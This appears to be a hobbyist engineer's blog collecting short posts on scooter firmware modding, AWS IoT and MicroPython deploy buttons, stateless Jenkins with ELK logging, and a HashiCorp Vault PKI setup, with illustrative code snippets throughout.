It was easy, too. Apparently the Xiaomi Mijia M365 is very commonly hacked already. They're extremely popular overseas, and people have already dedicated their time to reverse engineering the firmware. So much so that you can just use a webpage to change the settings and download a binary file to upload. Just download your bin file there, upload it with the Android app, connect to your scooter, and go.
This one was also fairly trivial. First thing I did was 3D print one of these bad boys. Then I ordered a 0.96" screen (4-pin I2C, not 7-pin SPI). Next you'll need an Arduino Pro Micro and an FTD1232 flasher, as well as a diode. Using this code, flash the Arduino and wire it according to his guides below. Note: I modified the locale files with some maths (along with other tweaks I'm not publishing) to do miles instead of kilometers and to change the intro logo and colors. Cover it using any M365 button cover via eBay. Done.
I, uh. Yeah. I assume you read my previous post about my physical deploy button. Well: I one-upped it. Let me explain. Nah, let's cut to it: I wanted to play with AWS IoT, and I did so shamelessly, with much architecture. I had a spare Raspberry Pi Zero W with a camera, so I did what any reasonable person would do: used it with no end goal.
I hooked it up to AWS IoT and made it listen to the shadow delta MQTT topic. Basically, whenever it saw a change to the shadow, it would kick off the routine. The listener looked something like the sketch below.
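A sketch using the AWS IoT Device SDK for Python; the endpoint, cert paths, and thing name are placeholders:

import time
from AWSIoTPythonSDK.MQTTLib import AWSIoTMQTTClient

def on_delta(client, userdata, message):
    # a change hit the shadow: snap the camera and smash the hulk hand
    print("shadow delta:", message.payload)

client = AWSIoTMQTTClient("hulk-smash")
client.configureEndpoint("xxxxxxxx-ats.iot.us-east-1.amazonaws.com", 8883)
client.configureCredentials("root-ca.pem", "private.key", "cert.pem")
client.connect()
client.subscribe("$aws/things/hulk-smash/shadow/update/delta", 1, on_delta)

# keep the process alive waiting for deltas
while True:
    time.sleep(1)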
Without further ado I give you: Hulk Smash Production.
The initial gif
And the final gif (yes the hulk hand is duct taped to a bamboo skewer to a stepper motor):
Over the last few weeks I've been looking for a project. I currently work for a Python shop and have really taken a liking to it. Simultaneously, I keep seeing new hardware supporting MicroPython. I'm not against the C-ish language that the Arduino-type stuff pushes, but it's nice to get the best of both worlds: an abstracted language with nice syntax and the ability to do dumb stuff with voltage. So I did just that. I've really wanted to play with the ESP8266 after seeing some cool projects cross my feeds, and I decided to kill two birds with one stone and try the Huzzah board from Adafruit that includes onboard Wi-Fi, because I hate money. The board itself was fantastic out of the box. Without doing much research whatsoever, my brain really thought that MicroPython was going to be a drop-in replacement for the UX of programming a board in the Arduino IDE. It's not. This is actually my biggest complaint about MicroPython. The code itself is very, very straightforward: write a main.py that does your stuff, and profit. You can load libraries that support MicroPython, etc.
Getting there? Meh. First, you have to flash your ESP with the MicroPython firmware. Next, you have to get your code onto the board, and the feedback loop for this is the annoying part. The first time you flash the firmware you have to enable WebREPL. It's a one-time cost, but it's smelly: it enables a Wi-Fi broadcast from the board that you can then access from WebREPL with a password. If you make it past the previous step, you can make main.py join your wireless network (note: 5GHz is not supported) with something like:
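The canonical connect snippet from the MicroPython docs looks like this:

import network

def do_connect(ssid, password):
    sta_if = network.WLAN(network.STA_IF)
    if not sta_if.isconnected():
        print("connecting to network...")
        sta_if.active(True)
        sta_if.connect(ssid, password)
        while not sta_if.isconnected():
            pass
    print("network config:", sta_if.ifconfig())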
Now that it's on the network, you can use WebREPL against the local address of the Huzzah. But it still sucks compared to the typical UX of: select board, click compile. If you're still reading, I'm sure you want to see what I did. Basically I took 4 mechanical keyboard switches (I have a lot, OK?!), wired them to the Huzzah, and made it send a Slack command to our internal Slack bot to force-deploy production (ignore all locks, send a message to yours truly):
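A sketch of the main.py (the pin, webhook URL, and the bot's command are placeholders):

import machine
import time
import urequests  # assumes the MicroPython urequests lib is loaded

button = machine.Pin(4, machine.Pin.IN, machine.Pin.PULL_UP)  # pin assumed
HOOK = "https://hooks.slack.com/services/T000/B000/XXXX"      # placeholder webhook

while True:
    if not button.value():  # active low: pressed when the switch pulls to ground
        urequests.post(HOOK, json={"text": "deploy production"})
        time.sleep(5)  # crude debounce so one smash == one deploy
    time.sleep(0.05)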
It works and it’s pretty empowering to smash. We deployed to production a record number of times that day.
Let me start off by saying: I've done a lot of Jenkins.
I've done new Jenkins (I love 2.0 and I love Jenkinsfiles).
I've worked with large Jenkins installs. I've worked with small Jenkins at multiple shops.
I've automated backups with S3 tarballs:
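The cron job is essentially tar + aws s3 cp; a sketch (paths and bucket are placeholders):

#!/bin/bash
set -e
STAMP=$(date +%F)
# tar up JENKINS_HOME and ship it to S3
tar -czf "/tmp/jenkins-${STAMP}.tar.gz" -C /var/lib/jenkins .
aws s3 cp "/tmp/jenkins-${STAMP}.tar.gz" "s3://my-jenkins-backups/${STAMP}/"
rm -f "/tmp/jenkins-${STAMP}.tar.gz"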
I've automated backups with ThinBackup.
I've automated creating jobs with job-dsl.
I've automated creating jobs with straight XML.
I've automated creating jobs with Jenkins Job Builder.
They all suck. I'm sorry. But they're complex and require a lot of orchestration and customization to work.
My problem with all these previous methods is they require a hybrid suck: you have to automate the jobs and mix that with retaining your backups.
I'm tired of things using the filesystem as a database.
These things are complex because the data lives in the same place as the jobs. When you build up your jobs they contain metadata about build history, so you end up with these nasty, complicated methods of pulling down and merging the filesystem.
My hypothesis: #(@$ that. Let's use a real database and artifact store for the data and just not care. Crazy, right?!
I've got some demo code to prove to you how easy it is. It's 100% groovy. No job-dsl, no nothing. Just groovy and java methods. The demo I posted shows how I automate the whole setup with groovy.
My Jenkins master is Docker. It's volatile. And it's stateless.
So how do I do it? In production my Docker hosts listen on UDP port 555 with Logstash for syslog and forward to ELK (because SSL, and other reasons). In my example the Logstash plugin just sends directly to Elasticsearch. All the env vars are pulled from Vault at run time, and I get to manage the data like my other data in ELK.
My artifacts go to something like Artifactory.
And guess what? It's fantastic. Automation is dead simple, and I put the data in a real database, which lets me do things like see build times across projects, see deployments, etc.
An example of how I typically get Vault into my base container:
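A sketch of the Dockerfile bits (base image and version pin are assumptions):

FROM alpine:3.9
ENV VAULT_VERSION=1.0.2
RUN apk add --no-cache ca-certificates curl unzip && \
    curl -sLo /tmp/vault.zip "https://releases.hashicorp.com/vault/${VAULT_VERSION}/vault_${VAULT_VERSION}_linux_amd64.zip" && \
    unzip /tmp/vault.zip -d /usr/local/bin && \
    rm /tmp/vault.zip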
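Presumably the entrypoint then pulls a cert at boot; a sketch (address, mount path, role, and CN are all placeholders):

#!/bin/sh
export VAULT_ADDR="https://vault.service.consul:8200"
# issue a cert off the PKI role, then split the bundle for the app
vault write -format=json pki_int/issue/my-service \
    common_name="my-service.example.com" ttl=72h > /tmp/issued.json
jq -r '.data.certificate' /tmp/issued.json > /etc/ssl/my-service.crt
jq -r '.data.private_key' /tmp/issued.json > /etc/ssl/my-service.key
exec "$@"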
If you somehow get the previous part to run, it will still fail, because you have to create the role in Vault before you can just start generating certs off it. In the cuddletech guide this is under "Requesting a Certificate for a Web Server", as:
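From the guide, roughly (mount path and role name assumed):

$ vault write pki_int/roles/my-service \
    allowed_domains="example.com" \
    allow_subdomains=true \
    max_ttl=72h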
But what if I told you that you could do that in terraform?
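A sketch using the Vault provider's vault_pki_secret_backend_role resource (mount path, role name, and domains are placeholders, mirroring the CLI example above):

resource "vault_pki_secret_backend_role" "my_service" {
  backend          = "pki_int"
  name             = "my-service"
  allowed_domains  = ["example.com"]
  allow_subdomains = true
  max_ttl          = "259200" # 72h, in seconds
}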
If you add that to your ECS task along with the Vault role and policy from the previous post about Vault Anything in Terraform, all your dependencies are met and kept in code! You can now generate certificates off your PKI backend and grab secrets all in one go!
(This is actually mostly a clone from here, but I want to make sure it never disappears.)
Note: you should not let the Vault server generate the root CA; you should generate it and import it. I just haven't figured out how to do that yet. I will update this post when I get around to it. More info on that here.
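First, mount and tune a PKI backend for the root (newer CLI syntax; path and TTL assumed):

$ vault secrets enable -path=pki pki
$ vault secrets tune -max-lease-ttl=87600h pki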
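Then generate the root (values assumed):

$ vault write pki/root/generate/internal \
    common_name="Cuddletech Root CA" \
    ttl=87600h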
Verify:
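For example, pull the CA back out over the API:

$ curl -s $VAULT_ADDR/v1/pki/ca/pem | openssl x509 -noout -subject -issuer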
Fix the URLs for accessing the CA/CRL:
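Roughly:

$ vault write pki/config/urls \
    issuing_certificates="$VAULT_ADDR/v1/pki/ca" \
    crl_distribution_points="$VAULT_ADDR/v1/pki/crl"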
Mount the PKI for the intermediate (similar to the root):
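E.g. (path and TTL assumed):

$ vault secrets enable -path=pki_int pki
$ vault secrets tune -max-lease-ttl=26280h pki_int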
Generate the intermediate CSR:
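Something like:

$ vault write pki_int/intermediate/generate/internal \
    common_name="Cuddletech Ops Intermediate CA"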
Cut and paste that CSR into a new file, cuddletech_ops.csr. The reason we output to a file here is so we can get it out of one backend, into another, and then back out.
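The signing happens against the root mount; roughly:

$ vault write pki/root/sign-intermediate \
    csr=@cuddletech_ops.csr \
    format=pem_bundle \
    ttl=26280h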
Now that we have a root-CA-signed cert, we'll need to cut and paste this certificate into a file we'll name cuddletech_ops.crt and then import it into our intermediate CA backend:
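Roughly:

$ vault write pki_int/intermediate/set-signed \
    certificate=@cuddletech_ops.crt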
Awesome! Let's verify the same way we did for the root.
The last thing we need to do is set the CA & CRL URLs for accessing the intermediate:
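Same idea as the root, pointed at the intermediate mount:

$ vault write pki_int/config/urls \
    issuing_certificates="$VAULT_ADDR/v1/pki_int/ca" \
    crl_distribution_points="$VAULT_ADDR/v1/pki_int/crl"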